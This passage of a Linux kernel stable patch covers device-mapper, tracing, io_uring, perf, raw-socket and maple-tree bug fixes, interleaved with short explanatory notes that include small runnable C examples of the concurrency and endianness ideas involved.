+ sector_t dm_bufio_get_device_size(struct dm_bufio_client *c);
+ struct dm_io_client *dm_bufio_get_dm_io_client(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_block_number(struct dm_buffer *b);
+diff --git a/include/linux/dm-dirty-log.h b/include/linux/dm-dirty-log.h
+index 7084503c3405f..843c857f07b0d 100644
+--- a/include/linux/dm-dirty-log.h
++++ b/include/linux/dm-dirty-log.h
+@@ -33,7 +33,7 @@ struct dm_dirty_log_type {
+ 	struct list_head list;
+ 
+ 	int (*ctr)(struct dm_dirty_log *log, struct dm_target *ti,
+-		   unsigned argc, char **argv);
++		   unsigned int argc, char **argv);
+ 	void (*dtr)(struct dm_dirty_log *log);
+ 
+ 	/*
+@@ -116,7 +116,7 @@ struct dm_dirty_log_type {
+ 	 * Support function for mirror status requests.
+ 	 */
+ 	int (*status)(struct dm_dirty_log *log, status_type_t status_type,
+-		      char *result, unsigned maxlen);
++		      char *result, unsigned int maxlen);
+ 
+ 	/*
+ 	 * is_remote_recovering is necessary for cluster mirroring. It provides
+@@ -139,7 +139,7 @@ int dm_dirty_log_type_unregister(struct dm_dirty_log_type *type);
+ struct dm_dirty_log *dm_dirty_log_create(const char *type_name,
+ 			struct dm_target *ti,
+ 			int (*flush_callback_fn)(struct dm_target *ti),
+-			unsigned argc, char **argv);
++			unsigned int argc, char **argv);
+ void dm_dirty_log_destroy(struct dm_dirty_log *log);
+ 
+ #endif	/* __KERNEL__ */
+diff --git a/include/linux/dm-io.h b/include/linux/dm-io.h
+index 8e1c4ab5df043..92e7abfe04f92 100644
+--- a/include/linux/dm-io.h
++++ b/include/linux/dm-io.h
+@@ -26,7 +26,7 @@ struct page_list {
+ 	struct page *page;
+ };
+ 
+-typedef void (*io_notify_fn)(unsigned long error, void *context);
++typedef void (*io_notify_fn)(unsigned int long error, void *context);
+ 
+ enum dm_io_mem_type {
+ 	DM_IO_PAGE_LIST,/* Page list */
+@@ -38,7 +38,7 @@ enum dm_io_mem_type {
+ struct dm_io_memory {
+ 	enum dm_io_mem_type type;
+ 
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	union {
+ 		struct page_list *pl;
+@@ -78,8 +78,8 @@ void dm_io_client_destroy(struct dm_io_client *client);
+  * Each bit in the optional 'sync_error_bits' bitset indicates whether an
+  * error occurred doing io to the corresponding region.
+  */
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
+-	  struct dm_io_region *region, unsigned long *sync_error_bits);
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
++	  struct dm_io_region *region, unsigned int long *sync_error_bits);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_IO_H */
+diff --git a/include/linux/dm-kcopyd.h b/include/linux/dm-kcopyd.h
+index c1707ee5b5408..68c412b31b788 100644
+--- a/include/linux/dm-kcopyd.h
++++ b/include/linux/dm-kcopyd.h
+@@ -23,11 +23,11 @@
+ #define DM_KCOPYD_WRITE_SEQ    2
+ 
+ struct dm_kcopyd_throttle {
+-	unsigned throttle;
+-	unsigned num_io_jobs;
+-	unsigned io_period;
+-	unsigned total_period;
+-	unsigned last_jiffies;
++	unsigned int throttle;
++	unsigned int num_io_jobs;
++	unsigned int io_period;
++	unsigned int total_period;
++	unsigned int last_jiffies;
+ };
+ 
+ /*
+@@ -60,12 +60,12 @@ void dm_kcopyd_client_flush(struct dm_kcopyd_client *kc);
+  * read_err is a boolean,
+  * write_err is a bitset, with 1 bit for each destination region
+  */
+-typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned long write_err,
++typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned int long write_err,
+ 				    void *context);
+ 
+ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ /*
+  * Prepare a callback and submit it via the kcopyd thread.
+@@ -80,11 +80,11 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+  */
+ void *dm_kcopyd_prepare_callback(struct dm_kcopyd_client *kc,
+ 				 dm_kcopyd_notify_fn fn, void *context);
+-void dm_kcopyd_do_callback(void *job, int read_err, unsigned long write_err);
++void dm_kcopyd_do_callback(void *job, int read_err, unsigned int long write_err);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_KCOPYD_H */
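[Note on the dm-io.h and dm-kcopyd.h hunks above: the mechanical "unsigned" -> "unsigned int" conversion turns a few occurrences of "unsigned long" into "unsigned int long" (io_notify_fn, dm_io(), dm_kcopyd_notify_fn, dm_kcopyd_do_callback). C permits declaration specifiers in any order, so this still names plain unsigned long and builds unchanged; it is only an odd spelling, not a type change. A quick runnable check:

#include <stdio.h>

int main(void)
{
	/* "unsigned int long" and "unsigned long" are the same type;
	 * specifier order is irrelevant in C (C11 6.7.2). */
	_Static_assert(sizeof(unsigned int long) == sizeof(unsigned long),
		       "same type, different spelling");

	unsigned int long v = ~0UL;
	printf("width: %zu bits\n", sizeof(v) * 8);
	return 0;
}
]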
+diff --git a/include/linux/dm-region-hash.h b/include/linux/dm-region-hash.h
+index 9e2a7a401df50..e8691539e1d77 100644
+--- a/include/linux/dm-region-hash.h
++++ b/include/linux/dm-region-hash.h
+@@ -37,7 +37,7 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions);
+ void dm_region_hash_destroy(struct dm_region_hash *rh);
+diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
+index 99f1146614c04..f4f9787d6a86b 100644
+--- a/include/linux/ftrace.h
++++ b/include/linux/ftrace.h
+@@ -970,7 +970,7 @@ static inline void __ftrace_enabled_restore(int enabled)
+ #define CALLER_ADDR5 ((unsigned long)ftrace_return_address(5))
+ #define CALLER_ADDR6 ((unsigned long)ftrace_return_address(6))
+ 
+-static inline unsigned long get_lock_parent_ip(void)
++static __always_inline unsigned long get_lock_parent_ip(void)
+ {
+ 	unsigned long addr = CALLER_ADDR0;
+ 
+diff --git a/include/linux/mm_types.h b/include/linux/mm_types.h
+index 9757067c30537..0e41359d364a6 100644
+--- a/include/linux/mm_types.h
++++ b/include/linux/mm_types.h
+@@ -810,7 +810,8 @@ struct mm_struct {
+ 	unsigned long cpu_bitmap[];
+ };
+ 
+-#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN)
++#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN | \
++			 MT_FLAGS_USE_RCU)
+ extern struct mm_struct init_mm;
+ 
+ /* Pointer magic because the dynamic array size confuses some compilers. */
+diff --git a/include/linux/pci-doe.h b/include/linux/pci-doe.h
+index ed9b4df792b88..43765eaf2342c 100644
+--- a/include/linux/pci-doe.h
++++ b/include/linux/pci-doe.h
+@@ -34,6 +34,10 @@ struct pci_doe_mb;
+  * @work: Used internally by the mailbox
+  * @doe_mb: Used internally by the mailbox
+  *
++ * Payloads are treated as opaque byte streams which are transmitted verbatim,
++ * without byte-swapping.  If payloads contain little-endian register values,
++ * the caller is responsible for conversion with cpu_to_le32() / le32_to_cpu().
++ *
+  * The payload sizes and rv are specified in bytes with the following
+  * restrictions concerning the protocol.
+  *
+@@ -45,9 +49,9 @@ struct pci_doe_mb;
+  */
+ struct pci_doe_task {
+ 	struct pci_doe_protocol prot;
+-	u32 *request_pl;
++	__le32 *request_pl;
+ 	size_t request_pl_sz;
+-	u32 *response_pl;
++	__le32 *response_pl;
+ 	size_t response_pl_sz;
+ 	int rv;
+ 	void (*complete)(struct pci_doe_task *task);
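[Note on the pci-doe.h hunk above: it documents that DOE payloads are opaque byte streams and switches the payload pointers to __le32, pushing any byte-swapping to the caller. A runnable userspace analogue of the cpu_to_le32()/le32_to_cpu() round trip it describes, with glibc's htole32()/le32toh() standing in for the kernel helpers:

#include <endian.h>
#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t host = 0x11223344;        /* register value in CPU order */
	uint32_t wire = htole32(host);     /* what lands in the payload */
	const unsigned char *b = (const unsigned char *)&wire;

	/* The payload bytes are 44 33 22 11 on any host endianness. */
	printf("payload bytes: %02x %02x %02x %02x\n", b[0], b[1], b[2], b[3]);
	printf("round trip:    %08x\n", le32toh(wire));
	return 0;
}
]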
+diff --git a/include/linux/phylink.h b/include/linux/phylink.h
+index c492c26202b5b..637698ed5cb6c 100644
+--- a/include/linux/phylink.h
++++ b/include/linux/phylink.h
+@@ -574,6 +574,7 @@ struct phylink *phylink_create(struct phylink_config *, struct fwnode_handle *,
+ 			       phy_interface_t iface,
+ 			       const struct phylink_mac_ops *mac_ops);
+ void phylink_destroy(struct phylink *);
++bool phylink_expects_phy(struct phylink *pl);
+ 
+ int phylink_connect_phy(struct phylink *, struct phy_device *);
+ int phylink_of_phy_connect(struct phylink *, struct device_node *, u32 flags);
+diff --git a/include/net/raw.h b/include/net/raw.h
+index 5e665934ebc7c..3af5289fdead9 100644
+--- a/include/net/raw.h
++++ b/include/net/raw.h
+@@ -15,6 +15,8 @@
+ 
+ #include <net/inet_sock.h>
+ #include <net/protocol.h>
++#include <net/netns/hash.h>
++#include <linux/hash.h>
+ #include <linux/icmp.h>
+ 
+ extern struct proto raw_prot;
+@@ -29,20 +31,27 @@ int raw_local_deliver(struct sk_buff *, int);
+ 
+ int raw_rcv(struct sock *, struct sk_buff *);
+ 
+-#define RAW_HTABLE_SIZE	MAX_INET_PROTOS
++#define RAW_HTABLE_LOG	8
++#define RAW_HTABLE_SIZE	(1U << RAW_HTABLE_LOG)
+ 
+ struct raw_hashinfo {
+ 	spinlock_t lock;
+-	struct hlist_nulls_head ht[RAW_HTABLE_SIZE];
++
++	struct hlist_head ht[RAW_HTABLE_SIZE] ____cacheline_aligned;
+ };
+ 
++static inline u32 raw_hashfunc(const struct net *net, u32 proto)
++{
++	return hash_32(net_hash_mix(net) ^ proto, RAW_HTABLE_LOG);
++}
++
+ static inline void raw_hashinfo_init(struct raw_hashinfo *hashinfo)
+ {
+ 	int i;
+ 
+ 	spin_lock_init(&hashinfo->lock);
+ 	for (i = 0; i < RAW_HTABLE_SIZE; i++)
+-		INIT_HLIST_NULLS_HEAD(&hashinfo->ht[i], i);
++		INIT_HLIST_HEAD(&hashinfo->ht[i]);
+ }
+ 
+ #ifdef CONFIG_PROC_FS
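[Note on the net/raw.h hunk above: it replaces per-protocol chaining (MAX_INET_PROTOS slots) with a 256-bucket table keyed by raw_hashfunc(), mixing the netns hash into the protocol number so sockets from different namespaces spread across buckets. A userspace sketch of the underlying hash_32() -- the multiplier is the kernel's GOLDEN_RATIO_32, and a constant stands in for net_hash_mix(net):

#include <stdint.h>
#include <stdio.h>

#define GOLDEN_RATIO_32 0x61C88647u
#define RAW_HTABLE_LOG  8

static uint32_t hash_32(uint32_t val, unsigned int bits)
{
	/* multiplicative hash: fold the mix down to the top 'bits' bits */
	return (val * GOLDEN_RATIO_32) >> (32 - bits);
}

int main(void)
{
	uint32_t net_mix = 0xdeadbeef;	/* stand-in for net_hash_mix(net) */
	uint32_t proto;

	for (proto = 0; proto < 4; proto++)
		printf("proto %u -> bucket %u of %u\n", proto,
		       hash_32(net_mix ^ proto, RAW_HTABLE_LOG),
		       1u << RAW_HTABLE_LOG);
	return 0;
}
]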
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index a4e9dbc7b67a8..add5cff7952c5 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2722,8 +2722,8 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
+ 	io_eventfd_unregister(ctx);
+ 	io_alloc_cache_free(&ctx->apoll_cache, io_apoll_cache_free);
+ 	io_alloc_cache_free(&ctx->netmsg_cache, io_netmsg_cache_free);
+-	mutex_unlock(&ctx->uring_lock);
+ 	io_destroy_buffers(ctx);
++	mutex_unlock(&ctx->uring_lock);
+ 	if (ctx->sq_creds)
+ 		put_cred(ctx->sq_creds);
+ 	if (ctx->submitter_task)
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 3002dc8271959..a90c820ce99e1 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -228,17 +228,18 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
+ 		return i;
+ 	}
+ 
+-	/* the head kbuf is the list itself */
++	/* protects io_buffers_cache */
++	lockdep_assert_held(&ctx->uring_lock);
++
+ 	while (!list_empty(&bl->buf_list)) {
+ 		struct io_buffer *nxt;
+ 
+ 		nxt = list_first_entry(&bl->buf_list, struct io_buffer, list);
+-		list_del(&nxt->list);
++		list_move(&nxt->list, &ctx->io_buffers_cache);
+ 		if (++i == nbufs)
+ 			return i;
+ 		cond_resched();
+ 	}
+-	i++;
+ 
+ 	return i;
+ }
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index fad170b475921..daecb8c9126b0 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -12155,7 +12155,7 @@ perf_event_set_output(struct perf_event *event, struct perf_event *output_event)
+ 	/*
+ 	 * If its not a per-cpu rb, it must be the same task.
+ 	 */
+-	if (output_event->cpu == -1 && output_event->ctx != event->ctx)
++	if (output_event->cpu == -1 && output_event->hw.target != event->hw.target)
+ 		goto out;
+ 
+ 	/*
+@@ -12875,12 +12875,14 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
+ 	__perf_pmu_remove(src_ctx, src_cpu, pmu, &src_ctx->pinned_groups, &events);
+ 	__perf_pmu_remove(src_ctx, src_cpu, pmu, &src_ctx->flexible_groups, &events);
+ 
+-	/*
+-	 * Wait for the events to quiesce before re-instating them.
+-	 */
+-	synchronize_rcu();
++	if (!list_empty(&events)) {
++		/*
++		 * Wait for the events to quiesce before re-instating them.
++		 */
++		synchronize_rcu();
+ 
+-	__perf_pmu_install(dst_ctx, dst_cpu, pmu, &events);
++		__perf_pmu_install(dst_ctx, dst_cpu, pmu, &events);
++	}
+ 
+ 	mutex_unlock(&dst_ctx->mutex);
+ 	mutex_unlock(&src_ctx->mutex);
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 8dd0127ddcb8d..e8808ffbea619 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -617,6 +617,7 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	if (retval)
+ 		goto out;
+ 
++	mt_clear_in_rcu(mas.tree);
+ 	mas_for_each(&old_mas, mpnt, ULONG_MAX) {
+ 		struct file *file;
+ 
+@@ -703,6 +704,8 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	retval = arch_dup_mmap(oldmm, mm);
+ loop_out:
+ 	mas_destroy(&mas);
++	if (!retval)
++		mt_set_in_rcu(mas.tree);
+ out:
+ 	mmap_write_unlock(mm);
+ 	flush_tlb_mm(oldmm);
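[Note on the dup_mmap() hunk above: it pairs with the MM_MT_FLAGS change (MT_FLAGS_USE_RCU) earlier in this patch. While the new mm is still private to fork, RCU mode is switched off so the bulk VMA copy can reuse tree nodes cheaply, and it is switched back on only when the copy fully succeeded; exit_mmap() in the mm/mmap.c hunk below clears it again before teardown. A toy model of that "build privately, publish in RCU mode afterwards" sequencing -- the tree type and helpers here are stand-ins, not the maple tree API:

#include <stdbool.h>
#include <stdio.h>

struct toy_tree {
	bool in_rcu;	/* when set, node frees must wait for readers */
	int nentries;
};

static void clear_in_rcu(struct toy_tree *t) { t->in_rcu = false; }
static void set_in_rcu(struct toy_tree *t)   { t->in_rcu = true; }

static int copy_all(struct toy_tree *dst)
{
	dst->nentries = 42;	/* pretend every VMA was copied over */
	return 0;		/* 0 on success, negative on error */
}

int main(void)
{
	struct toy_tree t = { .in_rcu = true, .nentries = 0 };
	int retval;

	clear_in_rcu(&t);	/* single owner: skip RCU bookkeeping */
	retval = copy_all(&t);
	if (!retval)
		set_in_rcu(&t);	/* publish only a fully-built tree */

	printf("copied=%d rcu=%d\n", t.nentries, (int)t.in_rcu);
	return retval ? 1 : 0;
}
]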
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index a47f7d93e32d2..5f662d1353727 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -5568,12 +5568,15 @@ int modify_ftrace_direct(unsigned long ip,
+ 		ret = 0;
+ 	}
+ 
+-	if (unlikely(ret && new_direct)) {
+-		direct->count++;
+-		list_del_rcu(&new_direct->next);
+-		synchronize_rcu_tasks();
+-		kfree(new_direct);
+-		ftrace_direct_func_count--;
++	if (ret) {
++		direct->addr = old_addr;
++		if (unlikely(new_direct)) {
++			direct->count++;
++			list_del_rcu(&new_direct->next);
++			synchronize_rcu_tasks();
++			kfree(new_direct);
++			ftrace_direct_func_count--;
++		}
+ 	}
+ 
+  out_unlock:
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 20cd8c9d245e2..12da17243747d 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -3102,6 +3102,10 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 		if (RB_WARN_ON(cpu_buffer,
+ 			       rb_is_reader_page(cpu_buffer->tail_page)))
+ 			return;
++		/*
++		 * No need for a memory barrier here, as the update
++		 * of the tail_page did it for this page.
++		 */
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		rb_inc_page(&cpu_buffer->commit_page);
+@@ -3111,6 +3115,8 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 	while (rb_commit_index(cpu_buffer) !=
+ 	       rb_page_write(cpu_buffer->commit_page)) {
+ 
++		/* Make sure the readers see the content of what is committed. */
++		smp_wmb();
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		RB_WARN_ON(cpu_buffer,
+@@ -4688,7 +4694,12 @@ rb_get_reader_page(struct ring_buffer_per_cpu *cpu_buffer)
+ 
+ 	/*
+ 	 * Make sure we see any padding after the write update
+-	 * (see rb_reset_tail())
++	 * (see rb_reset_tail()).
++	 *
++	 * In addition, a writer may be writing on the reader page
++	 * if the page has not been fully filled, so the read barrier
++	 * is also needed to make sure we see the content of what is
++	 * committed by the writer (see rb_set_commit_to_write()).
+ 	 */
+ 	smp_rmb();
+ 
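[Note on the ring-buffer hunks above: they pair a new smp_wmb() on the commit side with the existing smp_rmb() in rb_get_reader_page() -- the writer publishes page contents before updating the commit index, and the reader orders its read of the index before reading the contents. A runnable C11 analogue of that pairing, with atomic_thread_fence() standing in for smp_wmb()/smp_rmb():

#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

static int payload;			/* the "page contents" */
static atomic_int commit_idx;		/* the "commit index" */

static void *writer(void *arg)
{
	(void)arg;
	payload = 1234;					/* write data */
	atomic_thread_fence(memory_order_release);	/* smp_wmb() */
	atomic_store_explicit(&commit_idx, 1, memory_order_relaxed);
	return NULL;
}

static void *reader(void *arg)
{
	(void)arg;
	while (!atomic_load_explicit(&commit_idx, memory_order_relaxed))
		;					/* wait for commit */
	atomic_thread_fence(memory_order_acquire);	/* smp_rmb() */
	printf("saw %d\n", payload);			/* guaranteed 1234 */
	return NULL;
}

int main(void)
{
	pthread_t w, r;

	pthread_create(&r, NULL, reader, NULL);
	pthread_create(&w, NULL, writer, NULL);
	pthread_join(w, NULL);
	pthread_join(r, NULL);
	return 0;
}

Without the release fence, the reader could observe the new commit index yet still read a stale payload, which is exactly the reader-page race the hunk's comments describe.]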
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 1b692574fb0ca..1a931896ba042 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9472,6 +9472,7 @@ static int __remove_instance(struct trace_array *tr)
+ 	tracefs_remove(tr->dir);
+ 	free_percpu(tr->last_func_repeats);
+ 	free_trace_buffers(tr);
++	clear_tracing_err_log(tr);
+ 
+ 	for (i = 0; i < tr->nr_topts; i++) {
+ 		kfree(tr->topts[i].topts);
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index 67592eed0be8d..89083ae1aebe3 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -44,14 +44,21 @@ enum { ERRORS };
+ 
+ static const char *err_text[] = { ERRORS };
+ 
++static DEFINE_MUTEX(lastcmd_mutex);
+ static char *last_cmd;
+ 
+ static int errpos(const char *str)
+ {
++	int ret = 0;
++
++	mutex_lock(&lastcmd_mutex);
+ 	if (!str || !last_cmd)
+-		return 0;
++		goto out;
+ 
+-	return err_pos(last_cmd, str);
++	ret = err_pos(last_cmd, str);
++ out:
++	mutex_unlock(&lastcmd_mutex);
++	return ret;
+ }
+ 
+ static void last_cmd_set(const char *str)
+@@ -59,18 +66,22 @@ static void last_cmd_set(const char *str)
+ 	if (!str)
+ 		return;
+ 
++	mutex_lock(&lastcmd_mutex);
+ 	kfree(last_cmd);
+-
+ 	last_cmd = kstrdup(str, GFP_KERNEL);
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static void synth_err(u8 err_type, u16 err_pos)
+ {
++	mutex_lock(&lastcmd_mutex);
+ 	if (!last_cmd)
+-		return;
++		goto out;
+ 
+ 	tracing_log_err(NULL, "synthetic_events", last_cmd, err_text,
+ 			err_type, err_pos);
++ out:
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static int create_synth_event(const char *raw_command);
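[Note on the trace_events_synth.c hunk above: it serializes every reader and writer of last_cmd behind lastcmd_mutex, closing a window where one context could kfree() the string while another was still parsing it in errpos()/synth_err(). A runnable pthread sketch of the same guarded free-and-replace pattern; err_pos() is stood in by strstr():

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static pthread_mutex_t lastcmd_mutex = PTHREAD_MUTEX_INITIALIZER;
static char *last_cmd;

static void last_cmd_set(const char *str)
{
	pthread_mutex_lock(&lastcmd_mutex);
	free(last_cmd);			/* kfree() in the kernel version */
	last_cmd = strdup(str);		/* kstrdup(str, GFP_KERNEL) */
	pthread_mutex_unlock(&lastcmd_mutex);
}

static long errpos(const char *str)
{
	long pos = 0;
	char *hit;

	pthread_mutex_lock(&lastcmd_mutex);
	if (last_cmd && (hit = strstr(last_cmd, str)))
		pos = hit - last_cmd;	/* err_pos() stand-in */
	pthread_mutex_unlock(&lastcmd_mutex);
	return pos;
}

int main(void)
{
	last_cmd_set("myevent u64 lat; char msg[16]");
	printf("error at offset %ld\n", errpos("char"));
	last_cmd_set("other");	/* free + replace, all under the lock */
	return 0;
}
]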
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 210e1f1683929..2a1b337ac6434 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -1296,7 +1296,7 @@ static void notify_new_max_latency(u64 latency)
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(inst, &osnoise_instances, list) {
+ 		tr = inst->tr;
+-		if (tr->max_latency < latency) {
++		if (tracer_tracing_is_on(tr) && tr->max_latency < latency) {
+ 			tr->max_latency = latency;
+ 			latency_fsnotify(tr);
+ 		}
+@@ -1738,6 +1738,8 @@ static int timerlat_main(void *data)
+ 
+ 		trace_timerlat_sample(&s);
+ 
++		notify_new_max_latency(diff);
++
+ 		timerlat_dump_stack(time_to_us(diff));
+ 
+ 		tlat->tracing_thread = false;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index a63594bef72ea..fb452873914f2 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -149,13 +149,12 @@ struct maple_subtree_state {
+ /* Functions */
+ static inline struct maple_node *mt_alloc_one(gfp_t gfp)
+ {
+-	return kmem_cache_alloc(maple_node_cache, gfp | __GFP_ZERO);
++	return kmem_cache_alloc(maple_node_cache, gfp);
+ }
+ 
+ static inline int mt_alloc_bulk(gfp_t gfp, size_t size, void **nodes)
+ {
+-	return kmem_cache_alloc_bulk(maple_node_cache, gfp | __GFP_ZERO, size,
+-				     nodes);
++	return kmem_cache_alloc_bulk(maple_node_cache, gfp, size, nodes);
+ }
+ 
+ static inline void mt_free_bulk(size_t size, void __rcu **nodes)
+@@ -535,11 +534,14 @@ static inline struct maple_node *mte_parent(const struct maple_enode *enode)
+  */
+ static inline bool ma_dead_node(const struct maple_node *node)
+ {
+-	struct maple_node *parent = (void *)((unsigned long)
+-					     node->parent & ~MAPLE_NODE_MASK);
++	struct maple_node *parent;
+ 
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
++	parent = (void *)((unsigned long) node->parent & ~MAPLE_NODE_MASK);
+ 	return (parent == node);
+ }
++
+ /*
+  * mte_dead_node() - check if the @enode is dead.
+  * @enode: The encoded maple node
+@@ -551,6 +553,8 @@ static inline bool mte_dead_node(const struct maple_enode *enode)
+ 	struct maple_node *parent, *node;
+ 
+ 	node = mte_to_node(enode);
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
+ 	parent = mte_parent(enode);
+ 	return (parent == node);
+ }
+@@ -621,6 +625,8 @@ static inline unsigned int mas_alloc_req(const struct ma_state *mas)
+  * @node - the maple node
+  * @type - the node type
+  *
++ * In the event of a dead node, this array may be %NULL
++ *
+  * Return: A pointer to the maple node pivots
+  */
+ static inline unsigned long *ma_pivots(struct maple_node *node,
+@@ -813,6 +819,11 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ 	return rcu_dereference_check(slots[offset], mt_locked(mt));
+ }
+ 
++static inline void *mt_slot_locked(struct maple_tree *mt, void __rcu **slots,
++				   unsigned char offset)
++{
++	return rcu_dereference_protected(slots[offset], mt_locked(mt));
++}
+ /*
+  * mas_slot_locked() - Get the slot value when holding the maple tree lock.
+  * @mas: The maple state
+@@ -824,7 +835,7 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ static inline void *mas_slot_locked(struct ma_state *mas, void __rcu **slots,
+ 				       unsigned char offset)
+ {
+-	return rcu_dereference_protected(slots[offset], mt_locked(mas->tree));
++	return mt_slot_locked(mas->tree, slots, offset);
+ }
+ 
+ /*
+@@ -895,6 +906,45 @@ static inline void ma_set_meta(struct maple_node *mn, enum maple_type mt,
+ 	meta->end = end;
+ }
+ 
++/*
++ * mt_clear_meta() - clear the metadata information of a node, if it exists
++ * @mt: The maple tree
++ * @mn: The maple node
++ * @type: The maple node type
++ * @offset: The offset of the highest sub-gap in this node.
++ * @end: The end of the data in this node.
++ */
++static inline void mt_clear_meta(struct maple_tree *mt, struct maple_node *mn,
++				  enum maple_type type)
++{
++	struct maple_metadata *meta;
++	unsigned long *pivots;
++	void __rcu **slots;
++	void *next;
++
++	switch (type) {
++	case maple_range_64:
++		pivots = mn->mr64.pivot;
++		if (unlikely(pivots[MAPLE_RANGE64_SLOTS - 2])) {
++			slots = mn->mr64.slot;
++			next = mt_slot_locked(mt, slots,
++					      MAPLE_RANGE64_SLOTS - 1);
++			if (unlikely((mte_to_node(next) &&
++				      mte_node_type(next))))
++				return; /* no metadata, could be node */
++		}
++		fallthrough;
++	case maple_arange_64:
++		meta = ma_meta(mn, type);
++		break;
++	default:
++		return;
++	}
++
++	meta->gap = 0;
++	meta->end = 0;
++}
++
+ /*
+  * ma_meta_end() - Get the data end of a node from the metadata
+  * @mn: The maple node
+@@ -1092,8 +1142,11 @@ static int mas_ascend(struct ma_state *mas)
+ 		a_type = mas_parent_enum(mas, p_enode);
+ 		a_node = mte_parent(p_enode);
+ 		a_slot = mte_parent_slot(p_enode);
+-		pivots = ma_pivots(a_node, a_type);
+ 		a_enode = mt_mk_node(a_node, a_type);
++		pivots = ma_pivots(a_node, a_type);
++
++		if (unlikely(ma_dead_node(a_node)))
++			return 1;
+ 
+ 		if (!set_min && a_slot) {
+ 			set_min = true;
+@@ -1128,9 +1181,10 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ {
+ 	struct maple_alloc *ret, *node = mas->alloc;
+ 	unsigned long total = mas_allocated(mas);
++	unsigned int req = mas_alloc_req(mas);
+ 
+ 	/* nothing or a request pending. */
+-	if (unlikely(!total))
++	if (WARN_ON(!total))
+ 		return NULL;
+ 
+ 	if (total == 1) {
+@@ -1140,27 +1194,25 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ 		goto single_node;
+ 	}
+ 
+-	if (!node->node_count) {
++	if (node->node_count == 1) {
+ 		/* Single allocation in this node. */
+ 		mas->alloc = node->slot[0];
+-		node->slot[0] = NULL;
+ 		mas->alloc->total = node->total - 1;
+ 		ret = node;
+ 		goto new_head;
+ 	}
+-
+ 	node->total--;
+-	ret = node->slot[node->node_count];
+-	node->slot[node->node_count--] = NULL;
++	ret = node->slot[--node->node_count];
++	node->slot[node->node_count] = NULL;
+ 
+ single_node:
+ new_head:
+-	ret->total = 0;
+-	ret->node_count = 0;
+-	if (ret->request_count) {
